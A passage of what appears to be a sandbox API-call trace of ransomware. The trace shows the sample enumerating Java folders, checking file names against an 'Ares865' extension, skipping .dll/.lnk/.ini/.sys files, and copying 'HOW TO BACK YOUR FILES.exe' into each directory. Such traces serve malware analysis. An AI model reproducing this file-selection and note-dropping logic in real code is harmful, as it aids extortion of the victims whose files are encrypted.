(lpString1="Salta", lpString2=".sys") returned 1 [0056.137] lstrlenW (lpString="Salta") returned 5 [0056.137] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="San_Juan" | out: lpString1="San_Juan") returned="San_Juan" [0056.137] lstrlenW (lpString="San_Juan") returned 8 [0056.137] lstrlenW (lpString="Ares865") returned 7 [0056.137] lstrcmpiW (lpString1="an_Juan", lpString2="Ares865") returned -1 [0056.137] lstrlenW (lpString=".dll") returned 4 [0056.137] lstrcmpiW (lpString1="San_Juan", lpString2=".dll") returned 1 [0056.137] lstrlenW (lpString=".lnk") returned 4 [0056.137] lstrcmpiW (lpString1="San_Juan", lpString2=".lnk") returned 1 [0056.137] lstrlenW (lpString=".ini") returned 4 [0056.137] lstrcmpiW (lpString1="San_Juan", lpString2=".ini") returned 1 [0056.137] lstrlenW (lpString=".sys") returned 4 [0056.137] lstrcmpiW (lpString1="San_Juan", lpString2=".sys") returned 1 [0056.137] lstrlenW (lpString="San_Juan") returned 8 [0056.137] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="San_Luis" | out: lpString1="San_Luis") returned="San_Luis" [0056.137] lstrlenW (lpString="San_Luis") returned 8 [0056.137] lstrlenW (lpString="Ares865") returned 7 [0056.137] lstrcmpiW (lpString1="an_Luis", lpString2="Ares865") returned -1 [0056.137] lstrlenW (lpString=".dll") returned 4 [0056.137] lstrcmpiW (lpString1="San_Luis", lpString2=".dll") returned 1 [0056.137] lstrlenW (lpString=".lnk") returned 4 [0056.137] lstrcmpiW (lpString1="San_Luis", lpString2=".lnk") returned 1 [0056.137] lstrlenW (lpString=".ini") returned 4 [0056.138] lstrcmpiW (lpString1="San_Luis", lpString2=".ini") returned 1 [0056.138] lstrlenW (lpString=".sys") returned 4 [0056.138] lstrcmpiW (lpString1="San_Luis", lpString2=".sys") returned 1 [0056.138] lstrlenW (lpString="San_Luis") returned 8 [0056.138] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Tucuman" | out: lpString1="Tucuman") returned="Tucuman" [0056.138] lstrlenW (lpString="Tucuman") returned 7 [0056.138] lstrlenW (lpString="Ares865") returned 7 [0056.138] lstrlenW (lpString=".dll") returned 4 [0056.138] lstrcmpiW (lpString1="Tucuman", lpString2=".dll") returned 1 [0056.138] lstrlenW (lpString=".lnk") returned 4 [0056.138] lstrcmpiW (lpString1="Tucuman", lpString2=".lnk") returned 1 [0056.138] lstrlenW (lpString=".ini") returned 4 [0056.138] lstrcmpiW (lpString1="Tucuman", lpString2=".ini") returned 1 [0056.138] lstrlenW (lpString=".sys") returned 4 [0056.138] lstrcmpiW (lpString1="Tucuman", lpString2=".sys") returned 1 [0056.138] lstrlenW (lpString="Tucuman") returned 7 [0056.138] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Ushuaia" | out: lpString1="Ushuaia") returned="Ushuaia" [0056.138] lstrlenW (lpString="Ushuaia") returned 7 [0056.138] lstrlenW (lpString="Ares865") returned 7 [0056.138] lstrlenW (lpString=".dll") returned 4 [0056.138] lstrcmpiW (lpString1="Ushuaia", lpString2=".dll") returned 1 [0056.138] lstrlenW (lpString=".lnk") returned 4 [0056.138] lstrcmpiW (lpString1="Ushuaia", lpString2=".lnk") returned 1 [0056.138] lstrlenW (lpString=".ini") returned 4 [0056.138] lstrcmpiW (lpString1="Ushuaia", lpString2=".ini") returned 1 [0056.139] lstrlenW (lpString=".sys") returned 4 [0056.139] lstrcmpiW (lpString1="Ushuaia", lpString2=".sys") returned 1 [0056.139] lstrlenW (lpString="Ushuaia") returned 7 [0056.139] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa" [0056.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0056.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0056.139] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa") returned 46 [0056.139] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa" [0056.139] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.139] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.159] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.159] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52fb0940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52fb0940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0056.201] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.201] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.247] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Abidjan" | out: lpString1="Abidjan") returned="Abidjan" [0056.247] lstrlenW (lpString="Abidjan") returned 7 [0056.247] lstrlenW (lpString="Ares865") returned 7 [0056.247] lstrlenW (lpString=".dll") returned 4 [0056.247] lstrcmpiW (lpString1="Abidjan", lpString2=".dll") returned 1 [0056.247] lstrlenW (lpString=".lnk") returned 4 [0056.247] lstrcmpiW (lpString1="Abidjan", lpString2=".lnk") returned 1 [0056.247] lstrlenW (lpString=".ini") returned 4 [0056.247] lstrcmpiW (lpString1="Abidjan", lpString2=".ini") returned 1 [0056.247] lstrlenW (lpString=".sys") returned 4 [0056.247] lstrcmpiW (lpString1="Abidjan", lpString2=".sys") returned 1 [0056.247] lstrlenW (lpString="Abidjan") returned 7 [0056.248] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Accra" | out: lpString1="Accra") returned="Accra" [0056.248] lstrlenW (lpString="Accra") returned 5 [0056.248] lstrlenW (lpString="Ares865") returned 7 [0056.248] lstrlenW (lpString=".dll") returned 4 [0056.248] lstrcmpiW (lpString1="Accra", lpString2=".dll") returned 1 [0056.248] lstrlenW (lpString=".lnk") returned 4 [0056.248] lstrcmpiW (lpString1="Accra", lpString2=".lnk") returned 1 [0056.248] lstrlenW (lpString=".ini") returned 4 [0056.248] lstrcmpiW (lpString1="Accra", lpString2=".ini") returned 1 [0056.248] lstrlenW (lpString=".sys") returned 4 [0056.248] lstrcmpiW (lpString1="Accra", lpString2=".sys") returned 1 [0056.248] lstrlenW (lpString="Accra") returned 5 [0056.248] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Addis_Ababa" | out: lpString1="Addis_Ababa") returned="Addis_Ababa" [0056.248] lstrlenW (lpString="Addis_Ababa") returned 11 [0056.248] lstrlenW (lpString="Ares865") returned 7 [0056.248] lstrcmpiW (lpString1="s_Ababa", lpString2="Ares865") returned 1 [0056.248] lstrlenW (lpString=".dll") returned 4 [0056.248] lstrcmpiW (lpString1="Addis_Ababa", lpString2=".dll") returned 1 [0056.248] lstrlenW (lpString=".lnk") returned 4 [0056.248] lstrcmpiW (lpString1="Addis_Ababa", lpString2=".lnk") returned 1 [0056.248] lstrlenW (lpString=".ini") returned 4 [0056.248] lstrcmpiW (lpString1="Addis_Ababa", lpString2=".ini") returned 1 [0056.248] lstrlenW (lpString=".sys") returned 4 [0056.248] lstrcmpiW (lpString1="Addis_Ababa", lpString2=".sys") returned 1 [0056.248] lstrlenW (lpString="Addis_Ababa") returned 11 [0056.248] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Algiers" | out: lpString1="Algiers") returned="Algiers" [0056.248] lstrlenW (lpString="Algiers") returned 7 [0056.248] lstrlenW (lpString="Ares865") returned 7 [0056.248] lstrlenW (lpString=".dll") returned 4 [0056.248] lstrcmpiW (lpString1="Algiers", lpString2=".dll") returned 1 [0056.248] lstrlenW (lpString=".lnk") returned 4 [0056.249] lstrcmpiW (lpString1="Algiers", lpString2=".lnk") returned 1 [0056.249] lstrlenW (lpString=".ini") returned 4 [0056.249] lstrcmpiW (lpString1="Algiers", lpString2=".ini") returned 1 [0056.249] lstrlenW (lpString=".sys") returned 4 [0056.249] lstrcmpiW (lpString1="Algiers", lpString2=".sys") returned 1 [0056.249] lstrlenW (lpString="Algiers") returned 7 [0056.249] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Asmara" | out: lpString1="Asmara") returned="Asmara" [0056.249] lstrlenW (lpString="Asmara") returned 6 [0056.249] lstrlenW (lpString="Ares865") returned 7 [0056.249] lstrlenW (lpString=".dll") returned 4 [0056.249] lstrcmpiW (lpString1="Asmara", lpString2=".dll") returned 1 [0056.249] lstrlenW (lpString=".lnk") returned 4 [0056.249] lstrcmpiW (lpString1="Asmara", lpString2=".lnk") returned 1 [0056.249] lstrlenW (lpString=".ini") returned 4 [0056.249] lstrcmpiW (lpString1="Asmara", lpString2=".ini") returned 1 [0056.249] lstrlenW (lpString=".sys") returned 4 [0056.249] lstrcmpiW (lpString1="Asmara", lpString2=".sys") returned 1 [0056.249] lstrlenW (lpString="Asmara") returned 6 [0056.249] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Bamako" | out: lpString1="Bamako") returned="Bamako" [0056.249] lstrlenW (lpString="Bamako") returned 6 [0056.249] lstrlenW (lpString="Ares865") returned 7 [0056.249] lstrlenW (lpString=".dll") returned 4 [0056.249] lstrcmpiW (lpString1="Bamako", lpString2=".dll") returned 1 [0056.249] lstrlenW (lpString=".lnk") returned 4 [0056.249] lstrcmpiW (lpString1="Bamako", lpString2=".lnk") returned 1 [0056.249] lstrlenW (lpString=".ini") returned 4 [0056.249] lstrcmpiW (lpString1="Bamako", lpString2=".ini") returned 1 [0056.249] lstrlenW (lpString=".sys") returned 4 [0056.249] lstrcmpiW (lpString1="Bamako", lpString2=".sys") returned 1 [0056.249] lstrlenW (lpString="Bamako") returned 6 [0056.249] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Bangui" | out: lpString1="Bangui") returned="Bangui" [0056.250] lstrlenW (lpString="Bangui") returned 6 [0056.250] lstrlenW (lpString="Ares865") returned 7 [0056.250] lstrlenW (lpString=".dll") returned 4 [0056.250] lstrcmpiW (lpString1="Bangui", lpString2=".dll") returned 1 [0056.250] lstrlenW (lpString=".lnk") returned 4 [0056.250] lstrcmpiW (lpString1="Bangui", lpString2=".lnk") returned 1 [0056.250] lstrlenW (lpString=".ini") returned 4 [0056.250] lstrcmpiW (lpString1="Bangui", lpString2=".ini") returned 1 [0056.250] lstrlenW (lpString=".sys") returned 4 [0056.250] lstrcmpiW (lpString1="Bangui", lpString2=".sys") returned 1 [0056.250] lstrlenW (lpString="Bangui") returned 6 [0056.250] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Banjul" | out: lpString1="Banjul") returned="Banjul" [0056.250] lstrlenW (lpString="Banjul") returned 6 [0056.250] lstrlenW (lpString="Ares865") returned 7 [0056.250] lstrlenW (lpString=".dll") returned 4 [0056.250] lstrcmpiW (lpString1="Banjul", lpString2=".dll") returned 1 [0056.250] lstrlenW (lpString=".lnk") returned 4 [0056.250] lstrcmpiW (lpString1="Banjul", lpString2=".lnk") returned 1 [0056.250] lstrlenW (lpString=".ini") returned 4 [0056.250] lstrcmpiW (lpString1="Banjul", lpString2=".ini") returned 1 [0056.250] lstrlenW (lpString=".sys") returned 4 [0056.250] lstrcmpiW (lpString1="Banjul", lpString2=".sys") returned 1 [0056.250] lstrlenW (lpString="Banjul") returned 6 [0056.250] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Bissau" | out: lpString1="Bissau") returned="Bissau" [0056.250] lstrlenW (lpString="Bissau") returned 6 [0056.250] lstrlenW (lpString="Ares865") returned 7 [0056.250] lstrlenW (lpString=".dll") returned 4 [0056.250] lstrcmpiW (lpString1="Bissau", lpString2=".dll") returned 1 [0056.250] lstrlenW (lpString=".lnk") returned 4 [0056.250] lstrcmpiW (lpString1="Bissau", lpString2=".lnk") returned 1 [0056.250] lstrlenW (lpString=".ini") returned 4 [0056.250] lstrcmpiW (lpString1="Bissau", lpString2=".ini") returned 1 [0056.250] lstrlenW (lpString=".sys") returned 4 [0056.251] lstrcmpiW (lpString1="Bissau", lpString2=".sys") returned 1 [0056.251] lstrlenW (lpString="Bissau") returned 6 [0056.251] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Blantyre" | out: lpString1="Blantyre") returned="Blantyre" [0056.251] lstrlenW (lpString="Blantyre") returned 8 [0056.251] lstrlenW (lpString="Ares865") returned 7 [0056.251] lstrcmpiW (lpString1="lantyre", lpString2="Ares865") returned 1 [0056.251] lstrlenW (lpString=".dll") returned 4 [0056.251] lstrcmpiW (lpString1="Blantyre", lpString2=".dll") returned 1 [0056.251] lstrlenW (lpString=".lnk") returned 4 [0056.251] lstrcmpiW (lpString1="Blantyre", lpString2=".lnk") returned 1 [0056.251] lstrlenW (lpString=".ini") returned 4 [0056.251] lstrcmpiW (lpString1="Blantyre", lpString2=".ini") returned 1 [0056.251] lstrlenW (lpString=".sys") returned 4 [0056.251] lstrcmpiW (lpString1="Blantyre", lpString2=".sys") returned 1 [0056.251] lstrlenW (lpString="Blantyre") returned 8 [0056.251] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Brazzaville" | out: lpString1="Brazzaville") returned="Brazzaville" [0056.251] lstrlenW (lpString="Brazzaville") returned 11 [0056.251] lstrlenW (lpString="Ares865") returned 7 [0056.251] lstrcmpiW (lpString1="zaville", lpString2="Ares865") returned 1 [0056.251] lstrlenW (lpString=".dll") returned 4 [0056.251] lstrcmpiW (lpString1="Brazzaville", lpString2=".dll") returned 1 [0056.251] lstrlenW (lpString=".lnk") returned 4 [0056.251] lstrcmpiW (lpString1="Brazzaville", lpString2=".lnk") returned 1 [0056.251] lstrlenW (lpString=".ini") returned 4 [0056.251] lstrcmpiW (lpString1="Brazzaville", lpString2=".ini") returned 1 [0056.251] lstrlenW (lpString=".sys") returned 4 [0056.251] lstrcmpiW (lpString1="Brazzaville", lpString2=".sys") returned 1 [0056.251] lstrlenW (lpString="Brazzaville") returned 11 [0056.251] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Bujumbura" | out: lpString1="Bujumbura") returned="Bujumbura" [0056.251] lstrlenW (lpString="Bujumbura") returned 9 [0056.251] lstrlenW (lpString="Ares865") returned 7 [0056.252] lstrcmpiW (lpString1="jumbura", lpString2="Ares865") returned 1 [0056.252] lstrlenW (lpString=".dll") returned 4 [0056.252] lstrcmpiW (lpString1="Bujumbura", lpString2=".dll") returned 1 [0056.252] lstrlenW (lpString=".lnk") returned 4 [0056.252] lstrcmpiW (lpString1="Bujumbura", lpString2=".lnk") returned 1 [0056.252] lstrlenW (lpString=".ini") returned 4 [0056.252] lstrcmpiW (lpString1="Bujumbura", lpString2=".ini") returned 1 [0056.252] lstrlenW (lpString=".sys") returned 4 [0056.252] lstrcmpiW (lpString1="Bujumbura", lpString2=".sys") returned 1 [0056.252] lstrlenW (lpString="Bujumbura") returned 9 [0056.252] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Cairo" | out: lpString1="Cairo") returned="Cairo" [0056.252] lstrlenW (lpString="Cairo") returned 5 [0056.252] lstrlenW (lpString="Ares865") returned 7 [0056.252] lstrlenW (lpString=".dll") returned 4 [0056.252] lstrcmpiW (lpString1="Cairo", lpString2=".dll") returned 1 [0056.252] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Casablanca" | out: lpString1="Casablanca") returned="Casablanca" [0056.252] lstrlenW (lpString="Casablanca") returned 10 [0056.252] lstrlenW (lpString="Ares865") returned 7 [0056.252] lstrcmpiW (lpString1="ablanca", lpString2="Ares865") returned -1 [0056.252] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Ceuta" | out: lpString1="Ceuta") returned="Ceuta" [0056.252] lstrlenW (lpString="Ceuta") returned 5 [0056.252] lstrlenW (lpString="Ares865") returned 7 [0056.252] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Conakry" | out: lpString1="Conakry") returned="Conakry" [0056.252] lstrlenW (lpString="Conakry") returned 7 [0056.252] lstrlenW (lpString="Ares865") returned 7 [0056.252] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Dakar" | out: lpString1="Dakar") returned="Dakar" [0056.253] lstrlenW (lpString="Dakar") returned 5 [0056.253] lstrlenW (lpString="Ares865") returned 7 [0056.253] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Dar_es_Salaam" | out: lpString1="Dar_es_Salaam") returned="Dar_es_Salaam" [0056.253] lstrlenW (lpString="Dar_es_Salaam") returned 13 [0056.253] lstrlenW (lpString="Ares865") returned 7 [0056.253] lstrcmpiW (lpString1="_Salaam", lpString2="Ares865") returned -1 [0056.253] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Djibouti" | out: lpString1="Djibouti") returned="Djibouti" [0056.253] lstrlenW (lpString="Djibouti") returned 8 [0056.253] lstrlenW (lpString="Ares865") returned 7 [0056.253] lstrcmpiW (lpString1="jibouti", lpString2="Ares865") returned 1 [0056.253] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Douala" | out: lpString1="Douala") returned="Douala" [0056.253] lstrlenW (lpString="Douala") returned 6 [0056.253] lstrlenW (lpString="Ares865") returned 7 [0056.253] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="El_Aaiun" | out: lpString1="El_Aaiun") returned="El_Aaiun" [0056.253] lstrlenW (lpString="El_Aaiun") returned 8 [0056.253] lstrlenW (lpString="Ares865") returned 7 [0056.253] lstrcmpiW (lpString1="l_Aaiun", lpString2="Ares865") returned 1 [0056.253] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Freetown" | out: lpString1="Freetown") returned="Freetown" [0056.253] lstrlenW (lpString="Freetown") returned 8 [0056.253] lstrlenW (lpString="Ares865") returned 7 [0056.253] lstrcmpiW (lpString1="reetown", lpString2="Ares865") returned 1 [0056.253] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Gaborone" | out: lpString1="Gaborone") returned="Gaborone" [0056.253] lstrlenW (lpString="Gaborone") returned 8 [0056.253] lstrlenW (lpString="Ares865") returned 7 [0056.254] lstrcmpiW (lpString1="aborone", lpString2="Ares865") returned -1 [0056.254] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Harare" | out: lpString1="Harare") returned="Harare" [0056.254] lstrlenW (lpString="Harare") returned 6 [0056.254] lstrlenW (lpString="Ares865") returned 7 [0056.254] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Johannesburg" | out: lpString1="Johannesburg") returned="Johannesburg" [0056.254] lstrlenW (lpString="Johannesburg") returned 12 [0056.254] lstrlenW (lpString="Ares865") returned 7 [0056.254] lstrcmpiW (lpString1="nesburg", lpString2="Ares865") returned 1 [0056.254] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Juba" | out: lpString1="Juba") returned="Juba" [0056.254] lstrlenW (lpString="Juba") returned 4 [0056.254] lstrlenW (lpString="Ares865") returned 7 [0056.254] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Kampala" | out: lpString1="Kampala") returned="Kampala" [0056.254] lstrlenW (lpString="Kampala") returned 7 [0056.254] lstrlenW (lpString="Ares865") returned 7 [0056.254] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Khartoum" | out: lpString1="Khartoum") returned="Khartoum" [0056.254] lstrlenW (lpString="Khartoum") returned 8 [0056.254] lstrlenW (lpString="Ares865") returned 7 [0056.254] lstrcmpiW (lpString1="hartoum", lpString2="Ares865") returned 1 [0056.254] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Kigali" | out: lpString1="Kigali") returned="Kigali" [0056.254] lstrlenW (lpString="Kigali") returned 6 [0056.254] lstrlenW (lpString="Ares865") returned 7 [0056.254] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Kinshasa" | out: lpString1="Kinshasa") returned="Kinshasa" [0056.255] lstrlenW (lpString="Kinshasa") returned 8 [0056.255] lstrlenW (lpString="Ares865") returned 7 [0056.255] lstrcmpiW (lpString1="inshasa", lpString2="Ares865") returned 1 [0056.255] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Lagos" | out: lpString1="Lagos") returned="Lagos" [0056.255] lstrlenW (lpString="Lagos") returned 5 [0056.255] lstrlenW (lpString="Ares865") returned 7 [0056.255] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Libreville" | out: lpString1="Libreville") returned="Libreville" [0056.255] lstrlenW (lpString="Libreville") returned 10 [0056.255] lstrlenW (lpString="Ares865") returned 7 [0056.255] lstrcmpiW (lpString1="reville", lpString2="Ares865") returned 1 [0056.255] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Lome" | out: lpString1="Lome") returned="Lome" [0056.255] lstrlenW (lpString="Lome") returned 4 [0056.255] lstrlenW (lpString="Ares865") returned 7 [0056.255] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Luanda" | out: lpString1="Luanda") returned="Luanda" [0056.255] lstrlenW (lpString="Luanda") returned 6 [0056.255] lstrlenW (lpString="Ares865") returned 7 [0056.255] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Lubumbashi" | out: lpString1="Lubumbashi") returned="Lubumbashi" [0056.255] lstrlenW (lpString="Lubumbashi") returned 10 [0056.255] lstrlenW (lpString="Ares865") returned 7 [0056.255] lstrcmpiW (lpString1="umbashi", lpString2="Ares865") returned 1 [0056.255] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Lusaka" | out: lpString1="Lusaka") returned="Lusaka" [0056.255] lstrlenW (lpString="Lusaka") returned 6 [0056.255] lstrlenW (lpString="Ares865") returned 7 [0056.256] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Malabo" | out: lpString1="Malabo") returned="Malabo" [0056.256] lstrlenW (lpString="Malabo") returned 6 [0056.256] lstrlenW (lpString="Ares865") returned 7 [0056.256] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Maputo" | out: lpString1="Maputo") returned="Maputo" [0056.256] lstrlenW (lpString="Maputo") returned 6 [0056.256] lstrlenW (lpString="Ares865") returned 7 [0056.256] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Maseru" | out: lpString1="Maseru") returned="Maseru" [0056.256] lstrlenW (lpString="Maseru") returned 6 [0056.256] lstrlenW (lpString="Ares865") returned 7 [0056.256] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Mbabane" | out: lpString1="Mbabane") returned="Mbabane" [0056.256] lstrlenW (lpString="Mbabane") returned 7 [0056.256] lstrlenW (lpString="Ares865") returned 7 [0056.256] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Mogadishu" | out: lpString1="Mogadishu") returned="Mogadishu" [0056.256] lstrlenW (lpString="Mogadishu") returned 9 [0056.256] lstrlenW (lpString="Ares865") returned 7 [0056.256] lstrcmpiW (lpString1="gadishu", lpString2="Ares865") returned 1 [0056.256] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Monrovia" | out: lpString1="Monrovia") returned="Monrovia" [0056.256] lstrlenW (lpString="Monrovia") returned 8 [0056.256] lstrlenW (lpString="Ares865") returned 7 [0056.256] lstrcmpiW (lpString1="onrovia", lpString2="Ares865") returned 1 [0056.256] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Nairobi" | out: lpString1="Nairobi") returned="Nairobi" [0056.256] lstrlenW (lpString="Nairobi") returned 7 [0056.256] lstrlenW (lpString="Ares865") returned 7 [0056.257] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Ndjamena" | out: lpString1="Ndjamena") returned="Ndjamena" [0056.257] lstrlenW (lpString="Ndjamena") returned 8 [0056.257] lstrlenW (lpString="Ares865") returned 7 [0056.257] lstrcmpiW (lpString1="djamena", lpString2="Ares865") returned 1 [0056.257] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Niamey" | out: lpString1="Niamey") returned="Niamey" [0056.257] lstrlenW (lpString="Niamey") returned 6 [0056.257] lstrlenW (lpString="Ares865") returned 7 [0056.257] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Nouakchott" | out: lpString1="Nouakchott") returned="Nouakchott" [0056.257] lstrlenW (lpString="Nouakchott") returned 10 [0056.257] lstrlenW (lpString="Ares865") returned 7 [0056.257] lstrcmpiW (lpString1="akchott", lpString2="Ares865") returned -1 [0056.257] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Ouagadougou" | out: lpString1="Ouagadougou") returned="Ouagadougou" [0056.257] lstrlenW (lpString="Ouagadougou") returned 11 [0056.257] lstrlenW (lpString="Ares865") returned 7 [0056.257] lstrcmpiW (lpString1="adougou", lpString2="Ares865") returned -1 [0056.257] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Porto-Novo" | out: lpString1="Porto-Novo") returned="Porto-Novo" [0056.257] lstrlenW (lpString="Porto-Novo") returned 10 [0056.257] lstrlenW (lpString="Ares865") returned 7 [0056.257] lstrcmpiW (lpString1="to-Novo", lpString2="Ares865") returned 1 [0056.257] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Sao_Tome" | out: lpString1="Sao_Tome") returned="Sao_Tome" [0056.257] lstrlenW (lpString="Sao_Tome") returned 8 [0056.257] lstrlenW (lpString="Ares865") returned 7 [0056.257] lstrcmpiW (lpString1="ao_Tome", lpString2="Ares865") returned -1 [0056.258] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Tripoli" | out: lpString1="Tripoli") returned="Tripoli" [0056.258] lstrlenW (lpString="Tripoli") returned 7 [0056.258] lstrlenW (lpString="Ares865") returned 7 [0056.258] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Tunis" | out: lpString1="Tunis") returned="Tunis" [0056.258] lstrlenW (lpString="Tunis") returned 5 [0056.258] lstrlenW (lpString="Ares865") returned 7 [0056.258] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Windhoek" | out: lpString1="Windhoek") returned="Windhoek" [0056.258] lstrlenW (lpString="Windhoek") returned 8 [0056.258] lstrlenW (lpString="Ares865") returned 7 [0056.258] lstrcmpiW (lpString1="indhoek", lpString2="Ares865") returned 1 [0056.258] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\security", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\security" [0056.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0056.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0056.258] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\security") returned 45 [0056.258] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\security" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\security" [0056.258] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.258] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.289] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.289] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x530e1440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x530e1440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.289] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.289] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.289] lstrcpyW (in: lpString1=0x2e2e8bc, 